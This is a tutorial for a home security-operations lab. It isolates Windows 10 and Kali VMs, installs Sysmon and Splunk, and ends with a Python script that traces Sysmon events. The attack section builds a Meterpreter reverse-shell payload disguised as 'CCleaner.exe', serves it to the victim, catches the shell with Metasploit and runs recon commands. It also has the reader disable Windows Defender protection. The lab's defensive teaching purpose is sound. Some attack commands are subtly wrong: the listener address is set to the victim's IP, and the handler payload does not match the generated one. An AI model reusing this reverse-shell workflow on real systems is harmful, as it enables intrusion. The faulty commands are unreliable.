How to build a basic SOC home lab and analyze malware.
- Building isolated Windows 10 & Kali VMs.
- Hardening & safely networking them.
- Attacking, logging & detecting with Splunk and Sysmon.
| Item | Recommended Version |
|---|---|
| Host OS | Windows 10/11 or Linux |
| VirtualBox | 7.x |
| Windows 10 ISO | Media Creation Tool |
| Kali Linux | Latest pre-built OVA |
| Splunk (Free) | 9.x |
| Sysmon | v15+ |
| 7-Zip | Latest |
- Download Oracle VirtualBox from the official website, then install it. (You can use other VMs, but mind that I used Oracle VM.)
- Download the Windows installation media: https://www.microsoft.com/en-us/software-download/windows10
- Click the downloaded file, choose 'create installation media' and then 'ISO file'.
- In Oracle VM, import the ISO file and configure the Windows 10 VM with resources your computer's specifications can handle.
- Then run the Windows 10 VM. Click 'install now', 'I don't have a product key', 'Windows 10 Pro' and 'custom'.
- Download and install the pre-built Kali VM: https://www.kali.org/get-kali/#kali-virtual-machines
- Download and install 7-Zip if you haven't already.
- In Oracle VM, set both your Kali VM (attacker) and Windows 10 VM (victim) to 'Internal Network'. In this scenario neither VM has internet access, but they can communicate with each other. This configuration allows me to run malware and analyze traffic without affecting my host machine. Then set the 'Network' settings for both VMs to whatever name you gave your 'Internal Network'.
- Run the Windows 10 VM and set its IPv4 address, for instance 192.168.20.10. Then run Kali and set its IPv4 address, for instance 192.168.20.11. Set the netmask to 24.
- Ping Kali from Windows to check whether the connection between the two VMs is established.
- In Windows 10, under 'Virus & threat protection settings', disable 'Real-time protection'.
- Close both VMs. Take 'snapshots' of both VMs so that if they become corrupted you can revert and reuse them.
- Then open both VMs, click 'Devices' at the top, hover over 'Shared Clipboard' and click 'Bidirectional'.
- In your Windows VM, install Guest Additions: VM window ▸ Devices ▸ Insert Guest Additions CD image. Inside Windows, open the virtual CD drive and run 'VBoxWindowsAdditions.exe', then reboot the VM.
- In VirtualBox Manager choose the VM ▸ Settings ▸ Shared Folders. On the right-hand side, click the blue folder with a green ➕ (Add new shared folder). Designate a folder where all the files will be kept so that they can later be transferred to the Windows VM.
- On the host machine, download Sysmon (https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon), Splunk (https://www.splunk.com/en_us/download.html), and the 'inputs.conf' and 'sysmonconfig' files (in my repository).
- Bring all the downloaded exe files and configuration files to the designated folder.
- Go to the Windows VM. Assuming you have brought the Sysmon installation files to the Downloads folder, open Windows PowerShell as administrator and run:

  ```powershell
  cd 'C:\Users\resis\Downloads\Sysmon'
  .\sysmon64.exe -i sysmonconfig.xml
  ```

  Then click 'Agree'.
- Install Splunk. Set a username and password. Copy the 'inputs.conf' file from the Downloads folder to local disk C: > Program Files > Splunk > etc > system > local.
- Open 'Services' by searching for it in the Windows search bar and restart the 'Splunkd Service'.
- On the host machine, download the Splunk Add-on for Microsoft Sysmon: https://splunkbase.splunk.com/app/5709
- Go to the Windows VM, open http://localhost:8000 and log in. Apps ▸ Manage Apps ▸ Install app from file. Choose file → select splunk-add-on-for-microsoft-sysmon_.tgz. Click Upload. Restart Splunk.
- Log into Splunk Web.
- Go to the Kali VM, open its terminal and enter these commands:

  ```shell
  msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.20.10 lport=4444 -f exe -o CCleaner.exe
  msfconsole
  use exploit/multi/handler
  set payload windows/x64/meterpreter/reverse_tcp
  set lhost 192.168.20.10
  exploit
  ```
- Open a new tab in the Kali terminal and enter this command:

  ```shell
  python3 -m http.server 9999
  ```
- Go to the Windows VM, open the web browser and enter your Kali's IP and port 9999, for instance 192.168.20.11:9999.
- Download CCleaner.exe, which is the malware, and run it. Ignore the warnings and allow Windows to run it.
- Go to Kali's terminal. By now there should be an open shell (connection).
- Enter these commands:

  ```shell
  shell
  net user
  net localgroup
  ipconfig
  ```
- Go to the Windows VM's web browser and create an index: Settings > Indexes > New Index > Index Name: endpoint, then click Save.
- Click 'Apps' and choose 'Search & Reporting'. In the search bar, enter `index=endpoint 192.168.20.11`. From these search results you can analyze all the network-traffic metadata.
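The `index=endpoint 192.168.20.11` search returns raw events; the analyst's next step is to pivot from the Sysmon network-connection event (Event ID 3) to the process that made it and to what that process launched afterwards (Event ID 1, process creation). The script below, added here as an illustration and not code from this guide or from Splunk, does that correlation offline over a handful of constructed Sysmon events shaped like the fields the Sysmon add-on extracts; the PIDs, paths and the attacker address 192.168.20.11 are assumptions matching the lab above.

```python
from collections import defaultdict

ATTACKER_IP = "192.168.20.11"   # Kali VM address used in this lab

# Constructed Sysmon events (subset of the fields the Splunk add-on extracts). Not real telemetry.
SAMPLE_EVENTS = [
    {"EventCode": 1, "ProcessId": 4120, "ParentProcessId": 3000,
     "Image": r"C:\Users\resis\Downloads\CCleaner.exe", "CommandLine": "CCleaner.exe"},
    {"EventCode": 3, "ProcessId": 4120, "Image": r"C:\Users\resis\Downloads\CCleaner.exe",
     "DestinationIp": ATTACKER_IP, "DestinationPort": 4444},
    {"EventCode": 1, "ProcessId": 4188, "ParentProcessId": 4120,
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
    {"EventCode": 1, "ProcessId": 4200, "ParentProcessId": 4188,
     "Image": r"C:\Windows\System32\net.exe", "CommandLine": "net user"},
    {"EventCode": 1, "ProcessId": 4212, "ParentProcessId": 4188,
     "Image": r"C:\Windows\System32\ipconfig.exe", "CommandLine": "ipconfig"},
    {"EventCode": 3, "ProcessId": 1700, "Image": r"C:\Program Files\Splunk\bin\splunkd.exe",
     "DestinationIp": "127.0.0.1", "DestinationPort": 8000},   # benign local traffic
]

def outbound_to_attacker(events, attacker_ip=ATTACKER_IP):
    """PIDs of processes with a Sysmon Event ID 3 connection to the attacker address."""
    return {e["ProcessId"] for e in events
            if e["EventCode"] == 3 and e.get("DestinationIp") == attacker_ip}

def child_commands(events, root_pid):
    """Command lines of every process beneath root_pid in the Event ID 1 parent/child tree."""
    children = defaultdict(list)
    for e in events:
        if e["EventCode"] == 1:
            children[e["ParentProcessId"]].append(e)
    found, stack = [], [root_pid]
    while stack:                      # depth-first walk of the process tree
        for child in children[stack.pop()]:
            found.append(child["CommandLine"])
            stack.append(child["ProcessId"])
    return found

def triage(events, attacker_ip=ATTACKER_IP):
    """Map each image that connected to the attacker to the commands run beneath it."""
    images = {e["ProcessId"]: e["Image"] for e in events if e["EventCode"] == 1}
    return {images.get(pid, f"pid {pid}"): child_commands(events, pid)
            for pid in sorted(outbound_to_attacker(events, attacker_ip))}

if __name__ == "__main__":
    for image, cmds in triage(SAMPLE_EVENTS).items():
        print(f"{image} -> {ATTACKER_IP}: {cmds}")
```

The same pivot in Splunk is a search for `EventCode=3 DestinationIp=192.168.20.11`, then a second search on the returned ProcessId for `EventCode=1` children.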